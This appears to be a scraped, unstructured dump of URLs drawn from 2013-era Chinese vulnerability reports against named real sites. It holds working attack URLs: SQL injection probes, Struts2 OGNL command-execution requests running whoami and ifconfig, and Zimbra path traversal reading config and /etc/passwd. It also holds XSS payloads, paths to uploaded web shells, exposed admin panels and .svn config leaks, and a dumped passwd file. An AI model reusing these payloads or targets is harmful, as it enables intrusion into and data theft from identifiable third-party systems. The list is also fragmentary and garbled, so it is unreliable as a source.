http://www.m1905.com/ftp/com1/html/294.html http://www.m1905.com/ftp/com1/html/295.html http://www.m1905.com/ftp/com1/html/296.html http://www.m1905.com/ftp/com1/html/297.html http://www.m1905.com/ftp/com1/html/298.html http://www.m1905.com/ftp/com1/html/299.html http://www.m1905.com/ftp/com1/html/300.html http://www.m1905.com/ftp/com1/html/301.html http://www.m1905.com/ftp/com1/html/302.html http://www.m1905.com/ftp/com1/html/303.html http://www.m1905.com/ftp/com1/html/304.html http://www.m1905.com/ftp/com1/html/305.html http://www.m1905.com/ftp/com1/html/306.html http://www.m1905.com/ftp/com1/html/307.html http://www.m1905.com/ftp/com1/html/308.html http://www.m1905.com/ftp/com1/html/309.html http://www.m1905.com/ftp/com1/html/310.html http://www.m1905.com/ftp/com1/html/311.html http://www.m1905.com/ftp/com1/html/312.html http://www.m1905.com/ftp/com1/html/313.html http://www.m1905.com/ftp/com1/html/314.html http://www.m1905.com/ftp/com1/html/315.html http://www.m1905.com/ftp/com1/html/316.html 
http://www.m1905.com/ftp/com1/html/317.html http://www.m1905.com/ftp/com1/html/318.html http://www.m1905.com/ftp/com1/html/319.html http://www.m1905.com/ftp/com1/html/320.html http://www.m1905.com/ftp/com1/html/321.html http://www.m1905.com/ftp/com1/html/322.html http://www.m1905.com/ftp/com1/html/323.html http://www.m1905.com/ftp/com1/html/324.html http://www.m1905.com/ftp/com1/html/325.html http://www.m1905.com/ftp/com1/html/326.html http://www.m1905.com/ftp/com1/html/327.html http://www.m1905.com/ftp/com1/html/328.html http://www.m1905.com/ftp/com1/html/329.html http://www.m1905.com/ftp/com1/html/330.html http://www.m1905.com/ftp/com1/html/331.html http://www.m1905.com/ftp/com1/html/332.html http://www.m1905.com/ftp/com1/html/333.html http://www.m1905.com/ftp/com1/html/334.html http://www.m1905.com/ftp/com1/html/335.html http://www.m1905.com/ftp/com1/html/336.html http://www.m1905.com/ftp/com1/html/337.html http://www.m1905.com/ftp/com1/html/338.html http://www.m1905.com/ftp/com1/html/339.html http://www.m1905.com/ftp/com1/html/340.html http://www.m1905.com/ftp/com1/html/341.html http://www.m1905.com/ftp/com1/html/342.html http://www.m1905.com/ftp/com1/html/343.html http://www.m1905.com/ftp/com1/html/344.html http://www.m1905.com/ftp/com1/html/345.html http://www.m1905.com/ftp/com1/html/346.html http://www.m1905.com/ftp/com1/html/347.html http://www.m1905.com/ftp/com1/html/348.html http://www.m1905.com/ftp/com1/html/349.html http://www.m1905.com/ftp/com1/html/350.html http://www.m1905.com/ftp/com1/html/351.html http://www.m1905.com/ftp/com1/html/352.html http://www.m1905.com/ftp/com1/html/353.html http://www.m1905.com/ftp/com1/html/354.html http://www.m1905.com/ftp/com1/html/355.html http://www.m1905.com/ftp/com1/html/356.html http://www.m1905.com/ftp/com1/html/357.html http://www.m1905.com/ftp/com1/html/358.html http://www.m1905.com/ftp/com1/html/359.html http://www.m1905.com/ftp/com1/html/360.html http://www.m1905.com/ftp/com1/html/361.html 
http://www.m1905.com/ftp/com1/html/362.html http://www.m1905.com/ftp/com1/html/363.html http://www.m1905.com/ftp/com1/html/364.html http://www.m1905.com/ftp/com1/html/365.html http://www.m1905.com/ftp/com1/html/366.html http://www.m1905.com/ftp/com1/html/367.html http://www.m1905.com/ftp/com1/html/368.html http://www.m1905.com/ftp/com1/html/369.html http://www.m1905.com/ftp/com1/html/370.html http://www.m1905.com/ftp/com1/html/371.html http://www.m1905.com/ftp/com1/html/372.html http://www.m1905.com/ftp/com1/html/373.html http://www.m1905.com/ftp/com1/html/374.html http://www.m1905.com/ftp/com1/html/375.html http://www.m1905.com/ftp/com1/html/376.html http://www.m1905.com/ftp/com1/html/377.html http://www.m1905.com/ftp/com1/html/378.html http://www.m1905.com/ftp/com1/html/379.html http://www.m1905.com/ftp/com1/html/380.html http://www.m1905.com/ftp/com1/html/381.html http://www.m1905.com/ftp/com1/html/382.html http://www.m1905.com/ftp/com1/html/383.html http://www.m1905.com/ftp/com1/html/384.html http://www.m1905.com/ftp/com1/html/385.html http://www.m1905.com/ftp/com1/html/386.html http://www.m1905.com/ftp/com1/html/387.html http://www.m1905.com/ftp/com1/html/388.html http://www.m1905.com/ftp/com1/html/389.html http://www.m1905.com/ftp/com1/html/390.html http://www.m1905.com/ftp/com1/html/391.html http://www.m1905.com/ftp/com1/html/392.html http://www.m1905.com/ftp/com1/html/393.html http://www.m1905.com/ftp/com1/html/394.html http://www.m1905.com/ftp/com1/html/395.html http://www.m1905.com/ftp/com1/html/396.html http://www.m1905.com/ftp/com1/html/397.html http://www.m1905.com/ftp/com1/html/398.html http://www.m1905.com/ftp/com1/html/399.html http://www.m1905.com/ftp/com1/html/400.html http://zgqx.zqgame.com/Main/Tutorial.aspx?type=actnews http://jjc.xjedu.gov.cn/index/index.php http://clock.mo.vancl.com http://wooyun.org/bugs/wooyun-2013-045146 http://www.gzjinsha.gov.cn/wwwroot.rar http://www.gzjinsha.gov.cn/index.php?m=admin 
http://elutongxing.com/forum/forum/getUserInfo/${id}链接无安全限制。${id}未自增,可以丛0开始遍历。如:http://elutongxing.com/forum/forum/getUserInfo/1。刚链接将返回完整的用户信息,包括明文密码。 http://lib2.cup.edu.cn/browse/cls_browsing_tree.php?s_doctype=99&cls=B&lvl=1 http://lib2.cup.edu.cn/browse/cls_browsing_tree.php?s_doctype=99&cls=B&lvl=1 http://bbs.7daysinn.cn/detail/67021 http://www.ahemc.gov.cn/loginTwo.action http://25555555.com/hotel/chuan/default2.aspx?eid=-1;%20waitfor%20delay%20%270:0:0%27%20--%20&id=1&sid=7 http://25555555.com//hotel/chuan/details.aspx?id=38%20AND%203*2*1%3d6%20AND%20405%3d405 http://25555555.com/hotel/jiudian/jiudianyuding.aspx?endtime=2013-12-07&ID=327&MID=206&starttime=2013-12-06 http://25555555.com/hotel/menpiao/menpiaoyuding.aspx?MID=112%20AND%203*2*1%3d6%20AND%20373%3d373 http://25555555.com/menpiao/chuan/default2.aspx?eid=-1;%20waitfor%20delay%20'0:0:0'%20--%20&id=1&sid=7 http://25555555.com/menpiao/chuan/details.aspx?id=38%20AND%203*2*1%3d6%20AND%20871%3d871 http://25555555.com/menpiao/jiudian/jiudianyuding.aspx?endtime=2013-12-13&ID=56&MID=73&starttime=2013-12-07 http://25555555.com/menpiao/menpiao/menpiaoyuding.aspx?MID=112%20AND%203*2*1%3d6%20AND%20793%3d793 http://25555555.com/newpaybank/chuan/default2.aspx?eid=-1;%20waitfor%20delay%20'0:0:0'%20--%20&id=1&sid=7 http://25555555.com/newpaybank/chuan/details.aspx?id=33%20AND%203*2*1%3d6%20AND%2034%3d34 http://25555555.com/newpaybank/jiudian/jiudianyuding.aspx?endtime=2013-12-13&ID=57&MID=73&starttime=2013-12-07 http://25555555.com/newpaybank/menpiao/menpiaoyuding.aspx?MID=112%20AND%203*2*1%3d6%20AND%20594%3d594 http://25555555.com/ship/chuan/default2.aspx?eid=-1;%20waitfor%20delay%20'0:0:0'%20--%20&id=1&sid=7 http://25555555.com/ship/chuan/details.aspx http://25555555.com/ship/jiudian/jiudianyuding.aspx http://spamlabel.mail.aliyun.com/spamlabel/login.htm http://www.hn118114.cn/?LIN=012021010054 http://218.204.36.28/license!getExpireDateOfDays.act 
http://www.paidai.com/managetopic.php?action=user_del_topic&boardid=47&topicid=202807&posterid=669387 http://www.paidai.com/managetopic.php?action=user_del_topic&boardid=45&topicid=202809&posterid=669387 http://job.zqgame.com http://job.zqgame.com/admin http://in.sdo.com/wp-admin/ http://mam.sdo.com/index.php?g=Admin&m=Index(现在似乎搜不到了,但猜解等其他方式也不是没可能获得此入口) http://api.mam.sdo.com/index.php?g=Admin&m=Index(似乎游戏服务器也是这个域名) http://ma.sdo.com/web1/data/business.asp看来即便没有注入漏洞也是可以猜解出来的) g.10006.co/lq http://s.zj189.cn http://s.zj189.cn/ http://cp.zj189.cn http://www.cieccpa.org/看了看,果然有很弱的洞洞 http://www.cieccpa.org/admin/ADD.asp http://www.cieccpa.org/admin/ADDUSER.HTM http://www.cieccpa.org/admin/gaiming.asp http://www.cieccpa.org/admin/modifyfile.asp www.jx.cecep.cn www.ceceptic.com www.zx.cecep.cn www.zj.cecep.cn www.iec.cecep.cn www.gyjn.cecep.cn www.sh.cecep.cn www.cecbec.com www.lhtr.cecep.cn www.fd.cecep.cn www.xcl.cecep.cn www.xunbohui.com www.cieccpa.com www.beic.cecic.corp www.tj.cecep.cn www.sd.cecep.cn www.cecamc.cn www.zh.cecep.cn www.zydt.cecep.cn http://struts.apache.org/release/2.3.x/docs/s2-016.html http://kfadmin.zqgame.com/index.action http://kfadmin.zqgame.com/index.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27whoami%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 
http://kfadmin.zqgame.com/index.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27ifconfig%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://zgqx.zqgame.com/Main/ListPage.aspx?type=news http://zgqx.zqgame.com/Main/Tutorial.aspx?type=actmess http://58.83.177.103/ http://58.83.177.102/test.php http://58.83.177.106/ http://58.83.177.103/ http://tg.gw.com.cn/dts/dtsadmin/index.php http://www.cppc.gov.cn/news_play.asp?id=845 http://www.bjfc.gov.cn/cms http://huodong.gw.com.cn/gold230/admin/Menu.php http://www.wooyun.org/bugs/wooyun-2013-045268/trace/423e44ff5296d7db5996934c56078c4b http://huodong.gw.com.cn/gold230//upload/138643384164.php http://huodong.gw.com.cn/M4sk.txt http://c5.dongfeng-citroen.com.cn/news_detail.php?id=25 http://c-quatre.dongfeng-citroen.com.cn/plus/ http://c-quatre.dongfeng-citroen.com.cn/data/ http://c-quatre.dongfeng-citroen.com.cn/data/mysql_error_trace.inc http://c-quatre.dongfeng-citroen.com.cn/gxadmin/login.php?gotopage=%2Fgxadmin%2Fconfig.php http://home.xizi.com http://home.xizi.com/index.php?a=lists_type&c=index&m=content&typeid=63 http://battery.tcl.com/read_news2.php?id=11 http://mgs.homeinns.com/ http://mgs.homeinns.com/motelbbs/ http://mgs.homeinns.com/motelbbs/Themes/b/wdwl.asp www.kumi.cn/360/xiaoyouxi/game.php?content=17613 http://old.homeinns.com/Present/ScoreIndex.aspx?MenuType=1 http://www.ujipin.com/s.php http://www.ujipin.com/goods.php http://ccidstudy.ccidnet.com http://www.online.sdu.edu.cn/schoolbus/ http://drops.wooyun.org/papers/64 http://wshy.daw.so/ http://wshy.daw.so/admin/Upload_Photo.asp http://f.xiashanet.com/post.php?catid=388 
https://api.t.163.com/oauth2/authorize?client_id=II5coZy8DdAtKt7a&redirect_uri=http%3A%2F%2Fapp.56.com%2Fcooperate%2Findex.php%3Faction%3DWeibo%26tag%3Dwy%26do%3DCheckLogin%26from%3Dregbox&response_type=code&state=unk-qogvtqoomz http://www.kaixin001.com/login/connect_login.php?appkey=2811954408540d263d3e2d49c54c2a1f&url=http%3A%2F%2Fapi.kaixin001.com%2Foauth2%2Fauthorize%3Fclient_id%3D2811954408540d263d3e2d49c54c2a1f%26response_type%3Dcode%26scope%3Dbasic+create_repaste%26state%3D54285e9d47c41d294eb12615d2be1344%26redirect_uri%3Dhttp%253A%252F%252Fwww.youku.com%252Fpartner_kaixinLoginCallback_wintype_null_operateStfrom_null%26tmp%3D1 http://www.synjones.net/MContent/EasySetup.aspx?type=123 http://sqlmap.org http://61.172.249.125/,存在弱口令账号admin http://202.200.168.108/Login/Index.aspx?LogoutUrl=/login http://wthrcdn.etouch.cn/WeatherApi?citykey=101200101 http://t.cn/8kVihEe http://t%2Ecn/8kVihEe http://api.tudou.com/auth/authorize.oauth?oauth_token=0555db89d8584763b600f4729c75f6ac&oauth_callback=http%3A%2F%2Fwww.youku.com%2Fpartner_tudouLoginCallback_wintype_null_operateStfrom_null http://api.open.uc.cn/authorize?client_id=20032&redirect_uri=http%3A%2F%2Flogin.weibo.cn%2Flogin%2Fuc_callback%3FbackURL%3Dhttp%253A%252F%252Fweibo.cn%252F%26amp%3BbackTitle%3D%25E6%2596%25B0%25E6%25B5%25AA%25E5%25BE%25AE%25E5%258D%259A%26amp%3Bvt%3D4%26amp%3Brevalid%3D2%26amp%3Bns%3D1&response_type=code error:redirect_uri_mismatch http://api.open.uc.cn/authorize?client_id=20032&response_type=code&redirect_uri=http%3A%2F%2Flogin.weibo.cn%40wooyun.org http://login.weibo.cn@wooyun.org http://www.qyslyj.gov.cn/html/jgsz/005515837.html http://www.qyslyj.gov.cn/FooSun_Data/FooSun_Data.mdb http://api.mam.sdo.com/index.php?g=Admin&m=Index http://api.mam.sdo.com/index.php?g=Admin&m=Admin http://api.mam.sdo.com/index.php?g=Admin&m=Admin&a=addAdmin http://api.mam.sdo.com/index.php?g=Admin&m=News&a=Add http://yzw.gdut.edu.cn/content.php?id=1859&typeid=183 http://yzw.gdut.edu.cn/login.html 
http://pccarertest.lenovo.com.cn:81/lenovo http://www.cydaj.gov.cn:80/Get/xxwj/onews.asp?id=575利用SQL注入可获取该网站的数据库信息,利用获取的用户名和密码登陆后台,可执行添加管理员及修改网站信息操作。 http://soft.talkweb.com.cn:8888/wcm/html/login.html www.mingxiao100.com http://www.182871.okwei.com/zhu.html?o=t&i=0&r=2&s=%25u8749%25u9E23&m=c_1 http://www.513vpn.cn/logs/error_log http://www.513vpn.cn/chkforgotpwd.php?username=caoool&action=mb http://s.zj189.cn/index.jsp?fromid=mall http://job.gdit.edu.cn/admin/manager/admin_voting_show.php?page_id=9 http://zsb.gdit.edu.cn http://www.lzgd.com.cn/ http://oa.lzgd.com.cn:8000/ http://bbs.open.t.qq.com/uc_server/data/config.inc.php http://movie.skyworth.com/manager/Default.aspx http://www.okshe.com/ ext:webkit协议可导致HTTP- ext:webkit:file:///mnt/sdcard/UCDownloads/localexec_payload.html ext:uc_dw:http://127.0.0.1:8888/localexec_payload.html http://www.513vpn.cn/logs/error_log www.513vpn.cn/baitianlei/ www.513vpn.cn/log/2013-08-09_alipay.log http://ting.zhangyue.com/ShowInfo.php?classid=176&id=9759&userid=undefined http://112.125.94.68/acc/business.do?method=crequest http://zone.wooyun.org/content/8960 http://mail.womai.com/zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 http://qk.cams.cma.gov.cn//jams/ch/index.aspx?quarter_id=m5sgekrP&year_id=2013 http://www.cz-fzb.gov.cn/vote/voteview.asp?questionid=2&VoteID=11 http://mobile.womai.com/wmapi/addressedit http://127.0.0.1/thinksaas/index.php?app=../../../../../../../../../../windows/win.ini%00.jpg http://www.hhhtld.gov.cn/inc/newfiele.asp?admin http://www.gzsp.gov.cn/admin/info_edita.jsp http://www.pzhsgdj.gov.cn/_WebDataFile/2005/06/shell.asp http://www.bjunesco.gov.cn/tz/asp.asp?T=ABGHIJKLMCDEF http://www.hnnjj.gov.cn/UserFiles/file/web.jsp http://www.edm.edu.cn/inside/cqsz.jsp http://zs.nacta.edu.cn/help.jsp http://jsjx.cuit.edu.cn/fileupload/images/upload/jspspya.jsp 
http://ssoc.cuit.edu.cn/fileupload/images/upload/jspspya.jsp http://www.cjpp.net/EN/column/jspspy.jsp http://course.lixin.edu.cn/course_center/files_upload/resource/X.jsp http://haoma.sogou.com/feed.php?v=1.2&hid=863077024535217&is=460006132136291&r=10114&dev=android&appvers=2.3.7.18220 http://zone.wooyun.org/content/8960 http://ccert.edu.cn/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 http://ccert.edu.cn/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 https://ccert.edu.cn:7071/zimbraAdmin/ http://www.lnly.gov.cn:8084/zxyg/frontNoteFind!userNoteList.action http://61.132.0.114:8080/lygApp/allAdvice.action http://product.imp3.net/product.php?id=7308 http://www.iiyi.com/i/tupu/index/count?tid=1存在盲注漏洞 http://dongman.zhangyue.com/Templates/Man16/Search.aspx?keys=12 www.lnhndf.com,我查了一下,这个公司确实做这个业务。真的好诡异!!! 
http://222.39.14.14/ http://222.39.14.168/security/index.aspx http://222.39.14.168/security/bindex.aspx http://222.39.14.168/security/workerlongin.aspx职工安全信息管理信息系统 http://222.39.14.168/security/managerlongin.aspx http://www.nmqyjl.com/的网站 http://www.nmqyjl.com/Book.asp http://www.nmqyjl.com/fkly.asp http://222.39.14.164/xz.asp http://222.39.14.218/ http://lib.jyc.edu.cn/news/show_news.jsp?news_id=108 http://www.exploit-db.com/exploits/30085/ http://mail.infzm.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 http://mail.infzm.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 http://www.19mcc.com.cn/company_detail.php?id=18” http://www.hlfire.gov.cn:8080/admin/index.action http://www.hlfire.gov.cn:8080/company/toLogin.action clsid:A74BF134-5213-46B5-AF36-CE1888315DC7 http://labs.idefense.com http://hcmail.hc360.com/zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx http://www.exploit-db.com/exploits/30085/ http://mail.people.com.cn/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip http://api.rd.xdf.cn/login.aspx db_name:TeachingPlanDB db_user:db_youneng http://app.xdf.cn/apps/category.php?sys=apple&idfrom=0&idcount=3&type=187 http://app.xdf.cn/apps/category.php?sys=apple&type=187&idfrom=0&idcount=3 http://job.admin5.com/Company/Com_Search.aspx?cvalid=1802 http://cj.xmut.edu.cn/cexmut/webConfigSet/configSetting.aspx?url=/login/index.aspx http://www.zscj.com.cn/jxjy/webConfigSet/configSetting.aspx?url=/jxjy/login/index.aspx http://210.43.0.25/webConfigSet/configSetting.aspx?url=/login/index.aspx http://59.74.193.139/webConfigSet/configSetting.aspx?url=/login/index.aspx 
http://120.203.1.254:1083/webConfigSet/configSetting.aspx?url=/login/index.aspx http://sns.com.cn/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 http://httpdazhangmen.playcrab.com/dzmpay2.php http://httpdazhangmen.playcrab.com/news_zw.php?aid=134 http://i-high.xdf.cn/webmanage/ http://i-high.xdf.cn/webmanage/system_dntb/uploadImg.aspx http://i-high.neworiental.org http://xiyigui.v5shop.com/manage后台免验证,水印上传拿shell,备案信息文件上传拿shell http://diysite.cdnhost.cn http://diysite.cdnhost.cn/news/html/?37'.html http://app.lenovo-idea.com/admin/login http://bx.cq.dyxfc.net http://v.17173.com/live/rank/rank.action PATH:/home/httpd/html/active/live/agreement/img/ encap:Ethernet F3:FC:4A:F8:F4 addr:117.27.230.153 Bcast:117.27.230.191 Mask:255.255.255.192 fcff:fe4a:f8f4/64 Scope:Link MTU:1500 packets:5667640 packets:2489078 txqueuelen:1000 http://saas.sundns.com/questions_details.aspx?ID=63 http://app.relonline.cn/download.php?file=../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin 
abrt:x:173:173::/etc/abrt:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin saslauth:x:498:496:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin pulse:x:497:495:PulseAudio Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin user:x:500:500:root:/home/user:/bin/bash yyy:x:501:501::/var/www/vhosts:/bin/bash www-data:x:496:490:www-data:/home/www-data:/bin/bash mysql:x:495:489:mysql:/home/mysql:/bin/bash wsf:x:502:502::/var/www/vhosts/horizon.lenovo.com.cn:/bin/bash pinotage:x:503:503::/var/www/vhosts/www.pinotage.me:/bin/bash nagios:x:494:488::/var/spool/nagios:/sbin/nologin http://weixin.lenovo-idea.com/admin/login url:http://mail.qiban365.com/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 http://lenovo.marketviewrc.com/sendcode.asp?username=e http://wps.talkweb.com.cn/tameai/TAMEAI/index.jsp http://www.itsmoe.com/Admin/File.aspx http://fm.tom.com http://fm.tom.com/a.rar http://fm.tom.com/dj-detail?ascription=--%3E%3Cscript%3Ealert%28123%29;%3C/sCript%3E http://fm.tom.com/1.txt http://dynamic.i.xunlei.com/ajax?c=user&a=myvip&callback=xsscode http://dynamic.i.xunlei.com/ajax?c=user&a=myvip&callback=%3Cscript%3Ealert%281%29%3C/script%3E http://niu.lashou.com/user/User/feedBack http://niu.lashou.com/user/User/feedBack http://www.gdfcl.com.cn/gdfcl/into/intolist.action;jsessionid=F615B1674EED74CFA8A0FB53CD9D8BFE http://www.gdfcl.com.cn/gdfcl/csss.jsp http://www.gdfcl.com.cn/gdfcl/cd.jsp http://www.gdfcl.com.cn/phpmyadmin/ 
http://www.gdfcl.com.cn/gdfcl/reshell.jsp(被转发至1.202.233.6 http://yangtian.lenovo.net http://yangtian.lenovo.net/userportal/productdetails.aspx?ID=c5KvbMJS https://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 http://it.homeinns.com/MymyitSrv/QueryLog.aspx http://mail.nxca.gov.cn/ http://www.driverdevelop.com/showsideline.php?id=645 http://123.125.219.44:8080/appDemo/login.jsp http://123.125.219.39/system/index.action http://it.homeinns.com/ito_beta/Main/Login.aspx http://dev.mumayi.com/ http://www.dianning.com/ http://www.eecn.com.cn/about/login.action http://bbs.uuu9.com/plugin.php?id=auction&action=search http://lbs.189.cn/ http://www.scal.com.cn/Invite2011/Detail.aspx?ID=8270 http://wx.233.com/login/?redirectURL=http://www.baidu.com http://wx.233.com/search/UserCenter/dy/admin/ProjectOrder/ http://wx.233.com/search/UserCenter/dy/admin/ProjectOrder/List.aspx?page=6 http://www.coalworld.net/jsp/info/ http://www.coalworld.net/jsp/channel/ http://www.coalworld.net/images/ http://www.coalworld.net/jsp/inc/ http://www.coalworld.net/indexnews/ http://www.coalworld.net/js/ http://www.coalworld.net/jsp/infopublic/ http://www.coalworld.net/publicfile/ http://219.143.235.36/index.php http://219.143.235.36:8080/snspam/homepage.asp http://www.111g.com/bbs/config/.svn/entries http://www.111g.com/bbs/config/.svn/text-base/config_global.php.svn-base http://www.111g.com/bbs/config/.svn/text-base/config_ucenter_default.php.svn-base http://erdosrcb.com/onewsn.asp?id=778 http://erdosrcb.com/onewsn.asp?id=778’,提示数据库出错 http://erdosrcb.com/onewsn.asp?id=778%20and%201=1 http://erdosrcb.com/onewsn.asp?id=778%20and%201=2 http://erdosrcb.com/admin/ercblogin.asp 
http://chat.shenghuojia.com/web/icc/chat/chat http://www.jlyy.gov.cn:8080/news!newsYyzhShow.action存在远程命令执行漏洞 https://smtp.yuchaihi.com:7071/zimbraAdmin/ http://www.cdip66.com/ http://www.cdip66.com/dede/ http://www.exploit-db.com/exploits/30085/ http://www.exploit-db.com/exploits/30085/ http://wooyun.org/bugs/wooyun-2013-040647 http://www.hbtysx.com:8080/MobileNews/mobile_win.action http://test.com/testpath/download.jsp?downfile=WEB-INF/web.xml http://java.sun.com/xml/ns/javaee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd http://192.168.0.186:8081/cas/login https://192.168.0.186:8081/cas/proxyValidate http://kingosoft.com/tld/ui http://test.com/testpath/download.jsp?downfile=c:boot.ini http://km.ip66.com/xz.php http://dongman.zhangyue.com/ http://dongman.zhangyue.com/WebResource.axd?d=6-LIxoJhrcD8PLx88H57pg2 http://dongman.zhangyue.com/ScriptResource.axd http://dongman.zhangyue.com/ScriptResource.axd?d=xa77lWQR9EdH0pnOad0AXtqoxiN60vpEYE9wvvWrHsoAAAAAAAAAAAAAAAAAAAAA0 http://dongman.zhangyue.com/templates/man16/indexzm.aspx?ty=-1 http://api.t.sohu.com/oauth/authorize?oauth_token=59910bf4d1d24620538dea201220eee4&oauth_callback=http%3A%2F%2Fone.bshare.cn%2Foauth%2Fcallback%3Fsite%3Dsohuminiblog http://hndczx.mep.gov.cn/mo/doc_view.jsp?newsid=bc7a0706-0142-1000-e000-0017c0a80721 http://sd.china.com.cn http://pop.pcpop.com/utility/convert/index.php http://biz.dazhe.qingdaonews.com/post_guestbook.php http://biz.dazhe.qingdaonews.com/post_guestbook.php http://venus.suning.com http://venus.suning.com/CN/user.aspx?act=tag&type=1&id=4 http://desk.yunduan.cn/bbs/utility/convert/index.php http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://wooyun.org/bugs/wooyun-2013-045611 http://bbs.game.tom.com/utility/convert/index.php 
http://www.lenovodm.cn http://staff.lenovogift.net http://staff.lenovogift.net/manager.asp http://staff.lenovogift.net/en/images/acu_test_OBboi.asp;.jpg http://zhangzhou.focus.cn/housemarket/type_search/index.php?page=10&location=0&bedroom=0&sittingroom=0&bathroom=0&low_build_area= http://www.cn010w.com/ http://bbs.feidee.com/convert/ http://one-push.han101.com/api/device_token?ver=iphone http://one-push.han101.com/info.php http://sosu.qidian.com/ http://www.cttzj.com/newfile/inc/hits.asp?news_id=250 http://qiaodan.tom.com/1.php http://tangyuan.tom.com/go.php http://tangyuan.tom.com/activity/20101001/hjsm_activity.php http://mia.relonline.cn/download.php?file=/../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt 